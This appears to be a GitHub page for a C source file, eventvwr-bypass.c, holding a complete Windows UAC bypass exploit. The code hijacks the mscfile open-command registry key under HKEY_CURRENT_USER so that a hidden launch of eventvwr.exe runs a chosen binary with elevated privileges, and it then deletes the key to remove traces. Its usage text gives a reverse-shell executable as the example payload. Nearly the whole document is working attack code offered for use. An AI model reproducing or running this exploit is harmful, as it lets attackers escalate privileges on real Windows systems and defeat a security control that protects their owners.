-
Notifications
You must be signed in to change notification settings - Fork 1
/
eventvwr-bypass.c
114 lines (86 loc) · 2.59 KB
/
eventvwr-bypass.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
/*
* Pretty standard code to recursively nuke a Reg Key
*/
int RegDelnodeRecurse (LPTSTR lpSubKey) {
LPTSTR lpEnd;
LONG lResult;
DWORD dwSize = MAX_PATH;
TCHAR szName[MAX_PATH];
HKEY hKey;
FILETIME ftWrite;
lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey);
if (lResult == ERROR_SUCCESS) return 1;
lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey);
if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND;
lpEnd = lpSubKey + lstrlen(lpSubKey);
*lpEnd++ = '\\';
*lpEnd = '\0';
if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) {
do {
strcpy(lpEnd, szName);
if (!RegDelnodeRecurse(lpSubKey)) break;
lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite);
} while (lResult == ERROR_SUCCESS);
}
lpEnd--;
*lpEnd = TEXT('\0');
RegCloseKey(hKey);
return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS;
}
/*
* Wrapper for above
*/
int RegDelnode() {
TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\mscfile";
return RegDelnodeRecurse(szDelKey);
}
void __c_exploitUAC(const char* binary) {
char curPath[MAX_PATH], evtVwr[MAX_PATH];
HKEY attackKey;
SHELLEXECUTEINFO exInfo;
/*
curPath is the command you want to elevate.
Below is an example that shows how to elevate
foobar.exe sitting in the same path as this
program.
*/
/*
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\foobar.exe");
*/
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\");
strcat(curPath, binary);
sprintf(evtVwr, "%s\\System32\\eventvwr.exe", getenv("SYSTEMROOT"));
if(!RegDelnode()) return;
if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", &attackKey)!=ERROR_SUCCESS) return;
RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath));
exInfo.lpVerb = "open";
exInfo.lpFile = evtVwr;
exInfo.nShow = 0;
exInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
exInfo.cbSize = sizeof(SHELLEXECUTEINFO);
exInfo.hwnd = 0;
exInfo.lpParameters = 0;
exInfo.lpDirectory = 0;
exInfo.hInstApp = 0;
ShellExecuteEx(&exInfo);
Sleep(5000);
TerminateProcess(exInfo.hProcess, 0);
RegCloseKey(attackKey);
RegDelnode();
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
printf("Usage:\n");
printf("\teventvwr-bypassuac-64.exe <command>\n\n");
printf("\tExample: eventvwr-bypassuac-64.exe rev443.exe\n");
}
__c_exploitUAC(argv[1]);
return 0;
}